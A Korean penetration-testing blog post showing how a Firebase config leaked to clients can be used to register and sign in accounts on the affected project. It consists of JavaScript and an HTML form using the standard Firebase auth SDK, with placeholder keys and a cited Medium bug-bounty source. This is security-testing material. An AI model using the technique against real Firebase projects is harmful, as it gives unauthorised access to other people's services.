| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | 5 | 6 | 7 |
| 8 | 9 | 10 | 11 | 12 | 13 | 14 |
| 15 | 16 | 17 | 18 | 19 | 20 | 21 |
| 22 | 23 | 24 | 25 | 26 | 27 | 28 |
Tags
- 모의해킹
- 많다..
- AWS
- aes
- 허리디스크
- 변태는
- Frida
- shell_gpt
- ssrf
- Sequoia
- intelmac
- 채팅환전사기
- 척추관협착증
- XSS
- Malware Sample
- jeb_mcp
- 취약점
- cve-2025-55182
- react2shell
- 안전결제
- mitmproxy
- 중고나라
- ue4dumper
- 네이버카페
- LFI
- 내부확산
- self-signed
- EC2
- S3
Archives
- Today
- Total
annyoung
firebase exploit with firebase keys 본문
//company data
var firebaseConfig = {
apiKey: "your_domain_key",
authDomain: "your_domain.firebaseapp.com",
databaseURL: "https://your_domain.firebaseio.com",
projectId: "your_domain-stage",
storageBucket: "your_domain.appspot.com",
messagingSenderId: "123456789012",
appId: "1:53234*****:web:23c8b288e919a*********",
};
// Initialize Firebase
firebase.initializeApp(firebaseConfig);
const auth = firebase.auth();
function signUp() {
var email = document.getElementById("email");
var password = document.getElementById("password");
const promise = auth.createUserWithEmailAndPassword(email.value, password.value);
promise.catch(e => alert(e.message));
alert("Signed Up");
}
function signIn() {
var email = document.getElementById("email");
var password = document.getElementById("password");
const promise = auth.signInWithEmailAndPassword(email.value, password.value);
promise.catch(e => alert(e.message));
}
function signOut() {
auth.signOut();
alert("Signed Out");
}
auth.onAuthStateChanged(function(user) {
if (user) {
var email = user.email;
alert("Active User " + email);
//Take user to a different or home page
//is signed in
} else {
alert("No Active User");
//no user is signed in
}
});<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Form</title>
<link rel="stylesheet" href="">
<!-- The core Firebase JS SDK is always required and must be listed first -->
<script src="https://www.gstatic.com/firebasejs/7.18.0/firebase-app.js"></script>
<script src="https://www.gstatic.com/firebasejs/7.18.0/firebase-auth.js"></script>
<script src="form.js"></script>
</head>
<body>
<h1>Form</h1>
<div id="fornContainer">
<div id="header"></div>
<input type="email" placeholder="email" id="email">
<input type="password" placeholder="password" id="password">
<button onclick="signUp()" id="signUp">Sign Up</button>
<button onclick="signIn()" id="signIn">Sign In</button>
<button onclick="signOut()" id="signUp">Sign Out</button>
</body>
클라이언트에 누출되는 firebaseConfig을 가지고 firebase 프로젝트에 계정을 추가할 수 있다.
물론, authentication 관련 설정을 해놓지 않은 경우만 가능한 것으로 보인다.
출처: https://vinay7751.medium.com/firebase-key-leak-and-how-to-exploit-firebase-keys-61b1e4057119
Firebase key leak and How to exploit firebase keys
Hello Hunters, I am going to share a vulnerability that I found very recently. I cannot disclose the website name so I will mention it as…
vinay7751.medium.com
'모의해킹' 카테고리의 다른 글
| SSRF port scan (0) | 2022.12.09 |
|---|---|
| js source map file (0) | 2022.12.02 |
| 모의해킹 시 해시(hash)에 대해 (0) | 2022.11.22 |
| Deeplink webview hijacking 취약점 분석 (0) | 2022.09.21 |
| Overriding getter and setter on document.cookie (0) | 2022.08.23 |
'모의해킹' Related Articles
more
Comments